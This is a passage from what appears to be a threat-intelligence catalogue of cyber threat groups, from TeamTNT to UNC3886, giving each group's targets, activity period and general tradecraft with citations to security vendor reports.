to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups.
TeamTNT
TeamTNT is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments. [Palo Alto Black-T October 2020](https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/) [Lacework TeamTNT May 2021](https://www.lacework.com/blog/taking-teamtnt-docker-images-offline) [Intezer TeamTNT September 2020](https://www.intezer.com/blog/cloud-security/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/) [Cado Security TeamTNT Worm August 2020](https://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/) [Unit 42 Hildegard Malware](https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/) [Trend Micro TeamTNT](https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf) [ATT TeamTNT Chimaera September 2020](https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera) [Aqua TeamTNT August 2020](https://blog.aquasec.com/container-security-tnt-container-attack) [Intezer TeamTNT Explosion September 2021](https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf)
LazyScripter
LazyScripter is threat group that has mainly targeted the airlines industry since at least 2018, primarily using open-source toolsets. [MalwareBytes LazyScripter Feb 2021](https://web.archive.org/web/20211003035156/https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf)
Confucius
Confucius is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers have noted similarities between Confucius and Patchwork, particularly in their respective custom malware code and targets. [TrendMicro Confucius APT Feb 2018](https://www.trendmicro.com/en_us/research/18/b/deciphering-confucius-cyberespionage-operations.html) [TrendMicro Confucius APT Aug 2021](https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html) [Uptycs Confucius APT Jan 2021](https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat)
Aquatic Panda
Aquatic Panda is a suspected China-based threat group with a dual mission of intelligence collection and industrial espionage. Active since at least May 2020, Aquatic Panda has primarily targeted entities in the telecommunications, technology, and government sectors. [CrowdStrike AQUATIC PANDA December 2021](https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/)
APT1
APT1 is a Chinese cyber espionage group that has been conducting cyber espionage against a broad range of victims.
APT10
menuPass is a threat group that has been active since at least 2006. Individual members of menuPass are known to have acted in association with the Chinese Ministry of State Security's (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.
HEXANE
HEXANE is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. HEXANE's TTPs appear similar to APT33 and OilRig but due to differences in victims and tools it is tracked as a separate entity. [Dragos Hexane](https://dragos.com/resource/hexane/) [Kaspersky Lyceum October 2021](https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf) [ClearSky Siamesekitten August 2021](https://www.clearskysec.com/siamesekitten/) [Accenture Lyceum Targets November 2021](https://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns)
BITTER
BITTER is a suspected South Asian cyber espionage threat group that has been active since at least 2013. BITTER has targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia. [Cisco Talos Bitter Bangladesh May 2022](https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html) [Forcepoint BITTER Pakistan Oct 2016](https://www.forcepoint.com/blog/x-labs/bitter-targeted-attack-against-pakistan)
Ember Bear
Ember Bear is a Russian state-sponsored cyber espionage group that has been active since at least 2020, linked to Russia's General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155). [CISA GRU29155 2024](https://www.cisa.gov/sites/default/files/2024-09/aa24-249a-russian-military-cyber-actors-target-us-and-global-critical-infrastructure.pdf) Ember Bear has primarily focused operations against Ukrainian government and telecommunication entities, but has also operated against critical infrastructure entities in Europe and the Americas. [Cadet Blizzard emerges as novel threat actor](https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/) Ember Bear conducted the WhisperGate destructive wiper attacks against Ukraine in early 2022. [CrowdStrike Ember Bear Profile March 2022](https://www.crowdstrike.com/blog/who-is-ember-bear/) [Mandiant UNC2589 March 2022](https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation) [CISA GRU29155 2024](https://www.cisa.gov/sites/default/files/2024-09/aa24-249a-russian-military-cyber-actors-target-us-and-global-critical-infrastructure.pdf) There is some confusion as to whether Ember Bear overlaps with another Russian-linked entity referred to as Saint Bear. At present available evidence strongly suggests these are distinct activities with different behavioral profiles. [Cadet Blizzard emerges as novel threat actor](https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/) [Palo Alto Unit 42 OutSteel SaintBot February 2022](https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/)
LAPSUS$
LAPSUS$ is cyber criminal threat group that has been active since at least mid-2021. LAPSUS$ specializes in large-scale social engineering and extortion operations, including destructive attacks without the use of ransomware. The group has targeted organizations globally, including in the government, manufacturing, higher education, energy, healthcare, technology, telecommunications, and media sectors. [BBC LAPSUS Apr 2022](https://www.bbc.com/news/technology-60953527) [MSTIC DEV-0537 Mar 2022](https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/) [UNIT 42 LAPSUS Mar 2022](https://unit42.paloaltonetworks.com/lapsus-group/)
POLONIUM
POLONIUM is a Lebanon-based group that has primarily targeted Israeli organizations, including critical manufacturing, information technology, and defense industry companies, since at least February 2022. Security researchers assess POLONIUM has coordinated their operations with multiple actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS), based on victim overlap as well as common techniques and tooling. [Microsoft POLONIUM June 2022](https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/)
Earth Lusca
Earth Lusca is a suspected China-based cyber espionage group that has been active since at least April 2019. Earth Lusca has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some Earth Lusca operations may be financially motivated. [TrendMicro EarthLusca 2022](https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf) Earth Lusca has used malware commonly used by other Chinese threat groups, including APT41 and the Winnti Group cluster, however security researchers assess Earth Lusca's techniques and infrastructure are separate. [TrendMicro EarthLusca 2022](https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf)
Aoqin Dragon
Aoqin Dragon is a suspected Chinese cyber espionage threat group that has been active since at least 2013. Aoqin Dragon has primarily targeted government, education, and telecommunication organizations in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. Security researchers noted a potential association between Aoqin Dragon and UNC94, based on malware, infrastructure, and targets. [SentinelOne Aoqin Dragon June 2022](https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/)
SideCopy
SideCopy is a Pakistani threat group that has primarily targeted South Asian countries, including Indian and Afghani government personnel, since at least 2019. SideCopy's name comes from its infection chain that tries to mimic that of Sidewinder, a suspected Indian threat group. [MalwareBytes SideCopy Dec 2021](https://www.malwarebytes.com/blog/news/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure)
Moses Staff
Moses Staff is a suspected Iranian threat group that has primarily targeted Israeli companies since at least September 2021. Moses Staff openly stated their motivation in attacking Israeli companies is to cause damage by leaking stolen sensitive data and encrypting the victim's networks without a ransom demand. [Checkpoint MosesStaff Nov 2021](https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/) Security researchers assess Moses Staff is politically motivated, and has targeted government, finance, travel, energy, manufacturing, and utility companies outside of Israel as well, including those in Italy, India, Germany, Chile, Turkey, the UAE, and the US. [Cybereason StrifeWater Feb 2022](https://www.cybereason.com/blog/research/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations)
EXOTIC LILY
EXOTIC LILY is a financially motivated group that has been closely linked with Wizard Spider and the deployment of ransomware including Conti and Diavol. EXOTIC LILY may be acting as an initial access broker for other malicious actors, and has targeted a wide range of industries including IT, cybersecurity, and healthcare since at least September 2021. [Google EXOTIC LILY March 2022](https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/)
CURIUM
CURIUM is an Iranian threat group, first reported in September 2019 and active since at least July 2018, targeting IT service providers in the Middle East. [Symantec Tortoiseshell 2019](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain) CURIUM has since invested in building relationships with potential targets via social media over a period of months to establish trust and confidence before sending malware. Security researchers note CURIUM has demonstrated great patience and persistence by chatting with potential targets daily and sending benign files to help lower their security consciousness. [Microsoft Iranian Threat Actor Trends November 2021](https://www.microsoft.com/en-us/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021)
Metador
Metador is a suspected cyber espionage group that was first reported in September 2022. Metador has targeted a limited number of telecommunication companies, internet service providers, and universities in the Middle East and Africa. Security researchers named the group Metador based on the "I am meta" string in one of the group's malware samples and the expectation of Spanish-language responses from C2 servers. [SentinelLabs Metador Sept 2022](https://assets.sentinelone.com/sentinellabs22/metador#page=1)
LuminousMoth
LuminousMoth is a Chinese-speaking cyber espionage group that has been active since at least October 2020. LuminousMoth has targeted high-profile organizations, including government entities, in Myanmar, the Philippines, Thailand, and other parts of Southeast Asia. Some security researchers have concluded there is a connection between LuminousMoth and Mustang Panda based on similar targeting and TTPs, as well as network infrastructure overlaps. [Kaspersky LuminousMoth July 2021](https://securelist.com/apt-luminousmoth/103332/) [Bitdefender LuminousMoth July 2021](https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited)
Scattered Spider
Scattered Spider is a native English-speaking cybercriminal group active since at least 2022. [CrowdStrike Scattered Spider Profile](https://www.crowdstrike.com/adversaries/scattered-spider/) [MSTIC Octo Tempest Operations October 2023](https://www.microsoft.com/en-us/security/blog/2023/10/25/octo-tempest-crosses-boundaries-to-facilitate-extortion-encryption-and-destruction/) The group initially targeted customer relationship management (CRM) providers, business process outsourcing (BPO) firms, and telecommunications and technology companies before expanding in 2023 to gaming, hospitality, retail, managed service provider (MSP), manufacturing, and financial sectors. [MSTIC Octo Tempest Operations October 2023](https://www.microsoft.com/en-us/security/blog/2023/10/25/octo-tempest-crosses-boundaries-to-facilitate-extortion-encryption-and-destruction/) Scattered Spider relies heavily on social engineering, including impersonating IT and help-desk staff, to gain initial access, bypass multi-factor authentication (MFA), and compromise enterprise networks. The group has adapted its tooling to evade endpoint detection and response (EDR) defenses and used ransomware for financial gain. [CISA Scattered Spider Advisory November 2023](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a) [CrowdStrike Scattered Spider BYOVD January 2023](https://www.crowdstrike.com/blog/scattered-spider-attempts-to-avoid-detection-with-bring-your-own-vulnerable-driver-tactic/) [Crowdstrike TELCO BPO Campaign December 2022](https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/) Scattered Spider had expanded into hybrid cloud and identity environments, using help-desk impersonation and MFA bypass to obtain administrator access in Okta, AWS, and Office 365. [Mandiant UNC3944 May 2025](https://cloud.google.com/blog/topics/threat-intelligence/unc3944-proactive-hardening-recommendations)
FIN13
FIN13 is a financially motivated cyber threat group that has targeted the financial, retail, and hospitality industries in Mexico and Latin America, as early as 2016. FIN13 achieves its objectives by stealing intellectual property, financial data, mergers and acquisition information, or PII. [Mandiant FIN13 Aug 2022](https://www.mandiant.com/resources/blog/fin13-cybercriminal-mexico) [Sygnia Elephant Beetle Jan 2022](https://web.archive.org/web/20220105132433/https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf)
Volt Typhoon
Volt Typhoon is a People's Republic of China (PRC) state-sponsored actor that has been active since at least 2021 primarily targeting critical infrastructure organizations in the US and its territories including Guam. Volt Typhoon's targeting and pattern of behavior have been assessed as pre-positioning to enable lateral movement to operational technology (OT) assets for potential destructive or disruptive attacks. Volt Typhoon has emphasized stealth in operations using web shells, living-off-the-land (LOTL) binaries, hands on keyboard activities, and stolen credentials. [CISA AA24-038A PRC Critical Infrastructure February 2024](https://www.cisa.gov/sites/default/files/2024-03/aa24-038a_csa_prc_state_sponsored_actors_compromise_us_critical_infrastructure_3.pdf) [Microsoft Volt Typhoon May 2023](https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/) [Joint Cybersecurity Advisory Volt Typhoon June 2023](https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF) [Secureworks BRONZE SILHOUETTE May 2023](https://web.archive.org/web/20230601025540/https://www.secureworks.com/blog/chinese-cyberespionage-group-bronze-silhouette-targets-us-government-and-defense-organizations)
TA2541
TA2541 is a cybercriminal group that has been targeting the aviation, aerospace, transportation, manufacturing, and defense industries since at least 2017. TA2541 campaigns are typically high volume and involve the use of commodity remote access tools obfuscated by crypters and themes related to aviation, transportation, and travel. [Proofpoint TA2541 February 2022](https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight) [Cisco Operation Layover September 2021](https://blog.talosintelligence.com/operation-layover-how-we-tracked-attack/)
MoustachedBouncer
MoustachedBouncer is a cyberespionage group that has been active since at least 2014 targeting foreign embassies in Belarus. [MoustachedBouncer ESET August 2023](https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/)
Mustard Tempest
Mustard Tempest is an initial access broker that has operated the SocGholish distribution network since at least 2017. Mustard Tempest has partnered with Indrik Spider to provide access for the download of additional malware including LockBit, WastedLocker, and remote access tools. [Microsoft Ransomware as a Service](https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/) [Microsoft Threat Actor Naming July 2023](https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide) [Secureworks Gold Prelude Profile](https://www.secureworks.com/research/threat-profiles/gold-prelude) [SocGholish-update](https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update)
Cinnamon Tempest
Cinnamon Tempest is a China-based threat group that has been active since at least 2021 deploying multiple strains of ransomware based on the leaked Babuk source code. Cinnamon Tempest does not operate their ransomware on an affiliate model or purchase access but appears to act independently in all stages of the attack lifecycle. Based on victimology, the short lifespan of each ransomware variant, and use of malware attributed to government-sponsored threat groups, Cinnamon Tempest may be motivated by intellectual property theft or cyberespionage rather than financial gain. [Microsoft Ransomware as a Service](https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/) [Microsoft Threat Actor Naming July 2023](https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide) [Trend Micro Cheerscrypt May 2022](https://www.trendmicro.com/en_se/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html) [SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022](https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader)
ToddyCat
ToddyCat is a sophisticated threat group that has been active since at least 2020 using custom loaders and malware in multi-stage infection chains against government and military targets across Europe and Asia. [Kaspersky ToddyCat June 2022](https://securelist.com/toddycat/106799/) [Kaspersky ToddyCat Check Logs October 2023](https://securelist.com/toddycat-keep-calm-and-check-logs/110696/)
APT5
APT5 is a China-based espionage actor that has been active since at least 2007 primarily targeting the telecommunications, aerospace, and defense industries throughout the U.S., Europe, and Asia. APT5 has displayed advanced tradecraft and significant interest in compromising networking devices and their underlying software including through the use of zero-day exploits. [NSA APT5 Citrix Threat Hunting December 2022](https://media.defense.gov/2022/Dec/13/2003131586/-1/-1/0/CSA-APT5-CITRIXADC-V1.PDF) [Microsoft East Asia Threats September 2023](https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RW1aFyW) [Mandiant Pulse Secure Zero-Day April 2021](https://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day) [Mandiant Pulse Secure Update May 2021](https://www.mandiant.com/resources/blog/updates-on-chinese-apt-compromising-pulse-secure-vpn-devices) [FireEye Southeast Asia Threat Landscape March 2015](https://web.archive.org/web/20220122121143/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-southeast-asia-threat-landscape.pdf) [Mandiant Advanced Persistent Threats](https://www.mandiant.com/resources/insights/apt-groups)
Malteiro
Malteiro is a financially motivated criminal group that is likely based in Brazil and has been active since at least November 2019. The group operates and distributes the Mispadu banking trojan via a Malware-as-a-Service (MaaS) business model. Malteiro mainly targets victims throughout Latin America (particularly Mexico) and Europe (particularly Spain and Portugal). [SCILabs Malteiro 2021](https://blog.scilabs.mx/en/cyber-threat-profile-malteiro/)
APT-C-23
APT-C-23 is a threat group that has been active since at least 2014. [symantec_mantis](https://web.archive.org/web/20231227054130/https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks) APT-C-23 has primarily focused its operations on the Middle East, including Israeli military assets. APT-C-23 has developed mobile spyware targeting Android and iOS devices since 2017. [welivesecurity_apt-c-23](https://web.archive.org/web/20201123042131/www.welivesecurity.com/2020/09/30/aptc23-group-evolves-its-android-spyware/)
Agrius
Agrius is an Iranian threat actor active since 2020 notable for a series of ransomware and wiper operations in the Middle East, with an emphasis on Israeli targets. [SentinelOne Agrius 2021](https://assets.sentinelone.com/sentinellabs/evol-agrius) [CheckPoint Agrius 2023](https://research.checkpoint.com/2023/agrius-deploys-moneybird-in-targeted-attacks-against-israeli-organizations/) Public reporting has linked Agrius to Iran's Ministry of Intelligence and Security (MOIS). [Microsoft Iran Cyber 2023](https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/05/Iran-turning-to-cyber-enabled-influence-operations-for-greater-effect-05022023.pdf)
Saint Bear
Saint Bear is a Russian-nexus threat actor active since early 2021, primarily targeting entities in Ukraine and Georgia. The group is notable for a specific remote access tool, Saint Bot, and information stealer, OutSteel in campaigns. Saint Bear typically relies on phishing or web staging of malicious documents and related file types for initial access, spoofing government or related entities. [Palo Alto Unit 42 OutSteel SaintBot February 2022](https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/) [Cadet Blizzard emerges as novel threat actor](https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/) Saint Bear has previously been confused with Ember Bear operations, but analysis of behaviors, tools, and targeting indicates these are distinct clusters.
INC Ransom
INC Ransom is a ransomware and data extortion threat group associated with the deployment of INC Ransomware that has been active since at least July 2023. INC Ransom has targeted organizations worldwide most commonly in the industrial, healthcare, and education sectors in the US and Europe. [Bleeping Computer INC Ransomware March 2024](https://www.bleepingcomputer.com/news/security/inc-ransom-threatens-to-leak-3tb-of-nhs-scotland-stolen-data/) [Cybereason INC Ransomware November 2023](https://www.cybereason.com/hubfs/dam/collateral/reports/threat-alert-inc-ransomware.pdf) [Secureworks GOLD IONIC April 2024](https://www.secureworks.com/blog/gold-ionic-deploys-inc-ransomware) [SentinelOne INC Ransomware](https://www.sentinelone.com/anthology/inc-ransom/)
Star Blizzard
Star Blizzard is a cyber espionage and influence group originating in Russia that has been active since at least 2019. Star Blizzard campaigns align closely with Russian state interests and have included persistent phishing and credential theft against academic, defense, government, NGO, and think tank organizations in NATO countries, particularly the US and the UK. [Microsoft Star Blizzard August 2022](https://www.microsoft.com/en-us/security/blog/2022/08/15/disrupting-seaborgiums-ongoing-phishing-operations/) [CISA Star Blizzard Advisory December 2023](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-341a) [StarBlizzard](https://www.microsoft.com/en-us/security/blog/2023/12/07/star-blizzard-increases-sophistication-and-evasion-in-ongoing-attacks/) [Google TAG COLDRIVER January 2024](https://blog.google/threat-analysis-group/google-tag-coldriver-russian-phishing-malware/)
Daggerfly
Daggerfly is a People's Republic of China-linked APT entity active since at least 2012. Daggerfly has targeted individuals, government and NGO entities, and telecommunication companies in Asia and Africa. Daggerfly is associated with exclusive use of MgBot malware and is noted for several potential supply chain infection campaigns. [Symantec Daggerfly 2023](https://symantec-enterprise-blogs.security.com/threat-intelligence/apt-attacks-telecoms-africa-mgbot) [ESET EvasivePanda 2023](https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/) [Symantec Daggerfly 2024](https://symantec-enterprise-blogs.security.com/threat-intelligence/daggerfly-espionage-updated-toolset) [ESET EvasivePanda 2024](https://www.welivesecurity.com/en/eset-research/evasive-panda-leverages-monlam-festival-target-tibetans/)
Winter Vivern
Winter Vivern is a group linked to Russian and Belorussian interests active since at least 2020 targeting various European government and NGO entities, along with sporadic targeting of Indian and US victims. The group leverages a combination of document-based phishing activity and server-side exploitation for initial access, leveraging adversary-controlled and -created infrastructure for follow-on command and control. [DomainTools WinterVivern 2021](https://www.domaintools.com/resources/blog/winter-vivern-a-look-at-re-crafted-government-maldocs/) [SentinelOne WinterVivern 2023](https://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/) [CERT-UA WinterVivern 2023](https://cert.gov.ua/article/3761104) [ESET WinterVivern 2023](https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/) [Proofpoint WinterVivern 2023](https://www.proofpoint.com/us/blog/threat-insight/exploitation-dish-best-served-cold-winter-vivern-uses-known-zimbra-vulnerability)
Moonstone Sleet
Moonstone Sleet is a North Korean-linked threat actor executing both financially motivated attacks and espionage operations. The group previously overlapped significantly with another North Korean-linked entity, Lazarus Group, but has differentiated its tradecraft since 2023. Moonstone Sleet is notable for creating fake companies and personas to interact with victim entities, as well as developing unique malware such as a variant delivered via a fully functioning game. [Microsoft Moonstone Sleet 2024](https://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/)
TA577
TA577 is an initial access broker (IAB) that has distributed QakBot and Pikabot, and was among the first observed groups distributing Latrodectus in 2023. [Latrodectus APR 2024](https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice)
TA578
TA578 is a threat actor that has used contact forms and email to initiate communications with victims and to distribute malware including Latrodectus, IcedID, and Bumblebee. [Latrodectus APR 2024](https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice) [Bitsight Latrodectus June 2024](https://www.bitsight.com/blog/latrodectus-are-you-coming-back)
RedCurl
RedCurl is a threat actor active since 2018 notable for corporate espionage targeting a variety of locations, including Ukraine, Canada and the United Kingdom, and a variety of industries, including but not limited to travel agencies, insurance companies, and banks. [group-ib_redcurl1](https://www.group-ib.com/resources/research-hub/red-curl/) RedCurl is allegedly a Russian-speaking threat actor. [group-ib_redcurl1](https://www.group-ib.com/resources/research-hub/red-curl/) [group-ib_redcurl2](https://www.group-ib.com/resources/research-hub/red-curl-2/) The group’s operations typically start with spearphishing emails to gain initial access, then the group executes discovery and collection commands and scripts to find corporate data. The group concludes operations by exfiltrating files to the C2 servers.
Sea Turtle
Sea Turtle is a Türkiye-linked threat actor active since at least 2017 performing espionage and service provider compromise operations against victims in Asia, Europe, and North America. Sea Turtle is notable for targeting registrars managing ccTLDs and complex DNS-based intrusions where the threat actor compromised DNS providers to hijack DNS resolution for ultimate victims, enabling Sea Turtle to spoof log in portals and other applications for credential collection. [Talos Sea Turtle 2019](https://blog.talosintelligence.com/seaturtle/) [Talos Sea Turtle 2019_2](https://blog.talosintelligence.com/sea-turtle-keeps-on-swimming/) [PWC Sea Turtle 2023](https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html) [Hunt Sea Turtle 2024](https://www.huntandhackett.com/blog/turkish-espionage-campaigns)
RedEcho
RedEcho is a People’s Republic of China-related threat actor associated with long-running intrusions in Indian critical infrastructure entities. RedEcho overlaps with various other PRC-linked threat groups, such as APT41, and is linked to ShadowPad malware use through shared infrastructure. [RecordedFuture RedEcho 2021](https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf) [RecordedFuture RedEcho 2022](https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf)
BlackByte
BlackByte is a ransomware threat actor operating since at least 2021. BlackByte is associated with several versions of ransomware also labeled BlackByte Ransomware. BlackByte ransomware operations initially used a common encryption key allowing for the development of a universal decryptor, but subsequent versions such as BlackByte 2.0 Ransomware use more robust encryption mechanisms. BlackByte is notable for operations targeting critical infrastructure entities among other targets across North America. [FBI BlackByte 2022](https://www.ic3.gov/CSA/2022/220211.pdf) [Picus BlackByte 2022](https://www.picussecurity.com/resource/ttps-used-by-blackbyte-ransomware-targeting-critical-infrastructure) [Symantec BlackByte 2022](https://www.security.com/threat-intelligence/blackbyte-exbyte-ransomware) [Microsoft BlackByte 2023](https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/) [Cisco BlackByte 2024](https://blog.talosintelligence.com/blackbyte-blends-tried-and-true-tradecraft-with-newly-disclosed-vulnerabilities-to-support-ongoing-attacks/)
APT42
APT42 is an Iranian-sponsored threat group that conducts cyber espionage and surveillance. [Mandiant APT42-charms](https://services.google.com/fh/files/misc/apt42-crooked-charms-cons-and-compromises.pdf) The group primarily focuses on targets in the Middle East region, but has targeted a variety of industries and countries since at least 2015. [Mandiant APT42-charms](https://services.google.com/fh/files/misc/apt42-crooked-charms-cons-and-compromises.pdf) APT42 starts cyber operations through spearphishing emails and/or the PINEFLOWER Android malware, then monitors and collects information from the compromised systems and devices. [Mandiant APT42-charms](https://services.google.com/fh/files/misc/apt42-crooked-charms-cons-and-compromises.pdf) Finally, APT42 exfiltrates data using native features and open-source tools. [Mandiant APT42-untangling](https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations) APT42 activities have been linked to Magic Hound by other commercial vendors. While there are behavior and software overlaps between Magic Hound and APT42, they appear to be distinct entities and are tracked as separate entities by their originating vendor.
Salt Typhoon
Salt Typhoon is a People's Republic of China (PRC) state-backed actor that has been active since at least 2019 and responsible for numerous compromises of network infrastructure at major U.S. telecommunication and internet service providers (ISP). [US Dept. of Treasury Salt Typhoon JAN 2025](https://home.treasury.gov/news/press-releases/jy2792) [Cisco Salt Typhoon FEB 2025](https://blog.talosintelligence.com/salt-typhoon-analysis/)
Storm-1811
Storm-1811 is a financially-motivated entity linked to Black Basta ransomware deployment. Storm-1811 is notable for unique phishing and social engineering mechanisms for initial access, such as overloading victim email inboxes with non-malicious spam to prompt a fake "help desk" interaction leading to the deployment of adversary tools and capabilities. [Microsoft Storm-1811 2024](https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/) [rapid7-email-bombing](https://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators) [RedCanary Storm-1811 2024](https://redcanary.com/blog/threat-intelligence/storm-1811-black-basta/) [RedCanary June Insights 2024](https://redcanary.com/blog/threat-intelligence/intelligence-insights-june-2024/)
Velvet Ant
Velvet Ant is a threat actor operating since at least 2021. Velvet Ant is associated with complex persistence mechanisms, the targeting of network devices and appliances during operations, and the use of zero day exploits. [Sygnia VelvetAnt 2024A](https://www.sygnia.co/blog/china-nexus-threat-group-velvet-ant/) [Sygnia VelvetAnt 2024B](https://www.sygnia.co/threat-reports-and-advisories/china-nexus-threat-group-velvet-ant-exploits-cisco-0-day/)
UNC3886
UNC3886 is a China-nexus cyberespionage group that has been active since at least 2022, targeting defense, technology, and telecommunication organizations located in the United States and the Asia-Pacific-Japan (APJ) regions. UNC3886 has displayed a deep understanding of edge devices and virtualization technologies through the exploitation of zero-day vulnerabilities and the use of novel malware families and utilities. [Mandiant Fortinet Zero Day](https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem) [Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023](https://cloud.google.com/blog/topics/threat-intelligence/vmware-esxi-zero-day-bypass/)
AppleJeus
